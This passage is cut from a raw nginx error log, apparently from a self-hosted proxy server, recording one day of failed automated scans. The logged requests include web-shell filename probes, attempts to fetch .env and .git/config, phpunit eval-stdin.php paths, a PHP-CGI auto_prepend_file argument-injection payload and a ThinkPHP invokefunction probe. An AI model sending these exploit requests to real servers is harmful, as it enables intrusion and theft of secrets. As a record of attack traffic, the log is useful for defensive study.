"profibot.direct.quickconnect.to" +2026/01/19 10:32:09 [error] 424#424: *315014 open() "/var/www/html/blox.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /blox.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:09 [error] 424#424: *315014 open() "/var/www/html/vx.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /vx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:09 [error] 424#424: *315014 open() "/var/www/html/mh.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /mh.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:09 [error] 424#424: *315014 open() "/var/www/html/pn.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /pn.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:09 [error] 424#424: *315014 open() "/var/www/html/O-Simple.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /O-Simple.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:09 [error] 424#424: *315014 open() "/var/www/html/smklh.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /smklh.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:10 [error] 424#424: *315014 open() "/var/www/html/mans.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /mans.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:10 [error] 424#424: *315014 open() "/var/www/html/horeg.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /horeg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:10 [error] 424#424: *315014 open() "/var/www/html/to.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /to.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:10 [error] 424#424: *315014 open() "/var/www/html/wp-good.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-good.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:11 [error] 424#424: *315014 open() "/var/www/html/fz.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /fz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:11 [error] 424#424: *315014 open() "/var/www/html/mini.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /mini.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:11 [error] 424#424: *315014 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET //x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:11 [error] 424#424: *315014 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:11 [error] 424#424: *315014 open() "/var/www/html/xxxx.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /xxxx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:12 [error] 424#424: *315014 open() "/var/www/html/moon.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /moon.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:12 [error] 424#424: *315014 open() "/var/www/html/ws46.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ws46.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:12 [error] 424#424: *315014 open() "/var/www/html/wp-22.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-22.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:12 [error] 424#424: *315014 open() "/var/www/html/user.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET //user.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:12 [error] 424#424: *315014 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:12 [error] 424#424: *315014 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET //content.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:13 [error] 424#424: *315014 open() "/var/www/html/wp-ana.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-ana.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:13 [error] 424#424: *315014 open() "/var/www/html/cwclass.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /cwclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:13 [error] 424#424: *315014 open() "/var/www/html/87.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /87.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:13 [error] 424#424: *315014 open() "/var/www/html/error.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /error.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:13 [error] 424#424: *315014 open() "/var/www/html/redi.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /redi.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:14 [error] 424#424: *315014 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:14 [error] 424#424: *315014 open() "/var/www/html/image.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /image.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:14 [error] 424#424: *315014 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:15 [error] 424#424: *315014 open() "/var/www/html/indo.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /indo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:15 [error] 424#424: *315014 open() "/var/www/html/0xx.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /0xx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:15 [error] 424#424: *315014 open() "/var/www/html/o.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:15 [error] 424#424: *315014 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:15 [error] 424#424: *315014 open() "/var/www/html/style.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:15 [error] 424#424: *315014 open() "/var/www/html/manager.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /manager.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:15 [error] 424#424: *315014 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:16 [error] 424#424: *315014 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /geck.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:16 [error] 424#424: *315014 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php? HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:16 [error] 424#424: *315014 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /file.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:17 [error] 424#424: *315014 open() "/var/www/html/11.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /11.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:17 [error] 424#424: *315014 open() "/var/www/html/s.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /s.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:17 [error] 424#424: *315014 open() "/var/www/html/sid3.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /sid3.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:17 [error] 424#424: *315014 open() "/var/www/html/ng.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ng.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:17 [error] 424#424: *315014 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:17 [error] 424#424: *315014 open() "/var/www/html/webix.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /webix.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:17 [error] 424#424: *315014 open() "/var/www/html/az.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /az.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:18 [error] 424#424: *315014 open() "/var/www/html/hans.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /hans.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:18 [error] 424#424: *315014 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET //403.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:18 [error] 424#424: *315014 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET //404.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:18 [error] 424#424: *315014 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET //buy.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:47:26 [error] 429#429: *315026 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 11:25:42 [error] 428#428: *315081 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:10:30 [error] 428#428: *315111 open() "/var/www/html/.env" failed (2: No such file or directory), client: 162.243.56.10, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 12:10:30 [error] 428#428: *315112 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 162.243.56.10, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/19 12:19:25 [error] 428#428: *315121 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 147.182.231.125, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "91.82.83.208" +2026/01/19 12:19:25 [error] 429#429: *315122 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 147.182.231.125, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "91.82.83.208" +2026/01/19 12:19:26 [error] 429#429: *315123 open() "/var/www/html/t4" failed (2: No such file or directory), client: 147.182.231.125, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "91.82.83.208" +2026/01/19 12:19:26 [error] 429#429: *315124 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 147.182.231.125, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 12:19:27 [error] 431#431: *316612 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 147.182.231.125, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91.82.83.208" +2026/01/19 12:19:28 [error] 431#431: *316613 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 147.182.231.125, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "91.82.83.208" +2026/01/19 12:19:28 [error] 431#431: *316614 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 147.182.231.125, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "91.82.83.208" +2026/01/19 12:33:45 [error] 431#431: *316628 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:49:58 [error] 428#428: *316644 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:00 [error] 428#428: *316644 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:02 [error] 428#428: *316644 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:03 [error] 428#428: *316644 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:04 [error] 428#428: *316644 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:06 [error] 428#428: *316644 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:08 [error] 428#428: *316644 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:09 [error] 428#428: *316644 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:13 [error] 428#428: *316644 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:14 [error] 428#428: *316644 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:16 [error] 428#428: *316644 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:19 [error] 428#428: *316644 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:20 [error] 428#428: *316644 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:22 [error] 428#428: *316644 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:24 [error] 428#428: *316644 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:26 [error] 428#428: *316644 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:27 [error] 428#428: *316644 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:30 [error] 428#428: *316644 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:32 [error] 428#428: *316644 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:35 [error] 428#428: *316644 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:38 [error] 428#428: *316644 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:42 [error] 428#428: *316644 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:43 [error] 428#428: *316644 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:45 [error] 428#428: *316644 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:47 [error] 428#428: *316644 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:49 [error] 428#428: *316644 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:52 [error] 428#428: *316644 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:53 [error] 428#428: *316644 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:56 [error] 428#428: *316644 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:58 [error] 428#428: *316644 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:50:59 [error] 428#428: *316644 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:51:01 [error] 428#428: *316644 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:51:03 [error] 428#428: *316644 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:51:07 [error] 428#428: *316644 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:51:08 [error] 428#428: *316644 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:51:10 [error] 428#428: *316644 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:51:13 [error] 428#428: *316644 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:51:15 [error] 428#428: *316644 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:51:17 [error] 428#428: *316644 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:51:19 [error] 428#428: *316644 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 12:51:24 [error] 428#428: *316644 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 182.137.118.27, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 13:22:29 [error] 428#428: *316727 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 13:27:04 [error] 428#428: *316735 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 154.81.14.204, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:01:10 [error] 429#429: *316763 open() "/var/www/html/_next" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:01:10 [error] 429#429: *316764 open() "/var/www/html/api" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:01:10 [error] 429#429: *316765 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:01:10 [error] 429#429: *316766 open() "/var/www/html/app" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:01:10 [error] 429#429: *316767 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:05:56 [error] 429#429: *316773 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 